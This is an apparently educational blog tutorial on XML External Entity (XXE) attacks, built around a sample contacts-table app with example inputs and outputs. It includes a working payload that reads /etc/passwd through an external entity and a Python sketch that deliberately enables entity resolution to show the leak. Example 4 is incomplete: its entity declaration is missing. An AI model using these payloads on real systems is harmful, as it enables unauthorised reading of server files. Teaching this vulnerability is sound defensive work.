The XXE attack has been around for a few years, but it didn’t get much attention until the last couple of years, when some high-profile cases at Facebook and PayPal brought it into the spotlight.

So, what is the XXE attack? XXE is an abbreviation for XML External Entity, a part of the XML spec that allows a document to declare entities that resolve to someplace external (not within the same document). The attack abuses that feature when an application parses XML supplied by someone it shouldn’t trust.

A few basic examples demonstrate the concept best. Let’s say that we have a web app that takes an XML file as input and displays it in a table.

Example 1

Here’s a sample input file-


<contacts>
  <contact>
    <login>bobw</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This is processed and displays the following-

login   name         email
bobw    Bob Walker   bob@bob.com
ajones  Alice Jones  alice@alice.com
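
As a rough sketch of what such an app might do behind the scenes, here is a small Python version built on the standard library’s xml.etree.ElementTree. This is not the actual app: the names SAMPLE, FIELDS, contact_rows and render_table are made up for illustration, and the "table" is just space-separated text.

```python
import xml.etree.ElementTree as ET

# Hypothetical stand-in for the web app's input (same data as the sample file).
SAMPLE = """<contacts>
  <contact>
    <login>bobw</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>"""

# Column order used for both parsing and display.
FIELDS = ("login", "name", "email")


def contact_rows(xml_text):
    """Parse the XML and return one (login, name, email) tuple per contact."""
    root = ET.fromstring(xml_text)
    return [
        tuple(contact.findtext(field, default="") for field in FIELDS)
        for contact in root.iter("contact")
    ]


def render_table(rows):
    """Render a header line followed by one space-separated line per row."""
    lines = [" ".join(FIELDS)]
    lines += [" ".join(row) for row in rows]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(contact_rows(SAMPLE)))
```

The important part is that whatever text the parser hands back for each field goes straight into the table, which is what the later examples take advantage of.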


Pretty straightforward, right?


Example 2

Now, let’s take the same example and add an entity-



<?xml version="1.0"?>
<!DOCTYPE contacts [
  <!ENTITY foo "Foo">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays-

login   name         email
Foo     Bob Walker   bob@bob.com
ajones  Alice Jones  alice@alice.com

What happened? On line 3 of the XML file we created an entity called foo whose value is the string “Foo”. We then used that entity, &foo;, in place of Bob’s login on line 7. While processing the document, the parser substituted “Foo” when it saw &foo;.
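
To see that substitution happen outside of a web app, here is a minimal sketch using Python’s standard xml.etree.ElementTree parser. The DOC string and the first_login helper are assumptions made for this illustration, with the entity declared the way the explanation above describes it.

```python
import xml.etree.ElementTree as ET

# Illustrative document: an internal entity "foo" declared in the DOCTYPE
# and referenced as &foo; inside the first <login> element.
DOC = """<?xml version="1.0"?>
<!DOCTYPE contacts [
  <!ENTITY foo "Foo">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
</contacts>"""


def first_login(xml_text):
    """Return the text of the first contact's <login> element."""
    root = ET.fromstring(xml_text)
    return root.findtext("contact/login")


if __name__ == "__main__":
    # The parser has already replaced &foo; with the entity's value.
    print(first_login(DOC))
```

By the time the application reads the login field, the reference is gone and only the replacement text remains, so the app has no way to tell it apart from a value typed directly into the file.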


Example 3

Now let’s do something really interesting. Consider the following-



<?xml version="1.0"?>
<!DOCTYPE contacts [
  <!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

This processes and displays-

login                            name         email
root:x:0:0:root:/root:/bin/bash  Bob Walker   bob@bob.com
ajones                           Alice Jones  alice@alice.com

What did it do? On line 3, the keyword SYSTEM means that this entity is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the XML. When the parser resolves &foo;, it reads that file, pulls its contents into the document, and the app then displays them.
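
The same behavior can be reproduced with a parser that is told to resolve external entities. The sketch below uses Python’s standard xml.sax module and makes a few assumptions worth calling out: a temporary file stands in for /etc/passwd so it runs anywhere, the names TextCollector, parse_text and demo are made up for illustration, and external entity resolution is switched on explicitly because recent Python versions (3.7.1 and later) leave it off by default.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data reported by the parser."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external):
    """Parse the document and return its text content as one string."""
    parser = xml.sax.make_parser()
    # Enabled here only to demonstrate the vulnerable configuration.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def demo():
    """Return the parsed text with external entities enabled, then disabled."""
    with tempfile.TemporaryDirectory() as tmp:
        # Stand-in for /etc/passwd (an assumption, so the sketch is portable).
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as f:
            f.write("root:x:0:0:root:/root:/bin/bash")
        doc = (
            '<?xml version="1.0"?>\n'
            "<!DOCTYPE contacts [\n"
            f'  <!ENTITY foo SYSTEM "{secret_path}">\n'
            "]>\n"
            "<contacts><contact><login>&foo;</login></contact></contacts>"
        ).encode("utf-8")
        return parse_text(doc, True), parse_text(doc, False)


if __name__ == "__main__":
    enabled, disabled = demo()
    print("external entities on: ", repr(enabled))
    print("external entities off:", repr(disabled))
```

With resolution turned on, the file’s contents show up as the login value; with it turned off, the reference is skipped and nothing from the file reaches the application.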


Example 4

Up to this point, the attacks have been against the server. How can we attack the user?

Consider this-



]>
<contacts>
  <contact>
    <login>&foo;</login>
    <name>Bob Walker</name>
    <email>bob@bob.com</email>
  </contact>
  <contact>
    <login>ajones</login>
    <name>Alice Jones</name>
    <email>alice@alice.com</email>
  </contact>
</contacts>

What do you think the external entity reference does here? It returns a script tag. When the table is displayed, that script is executed in the browser. (I’m not displaying the results like in previous examples because the script would execute while you are reading this; it’s just an example showing that the app is vulnerable.)

I hope these examples give you a basic understanding of what the XXE vulnerability is. I’ll likely do a follow-up post soon with more advanced examples and how to mitigate it.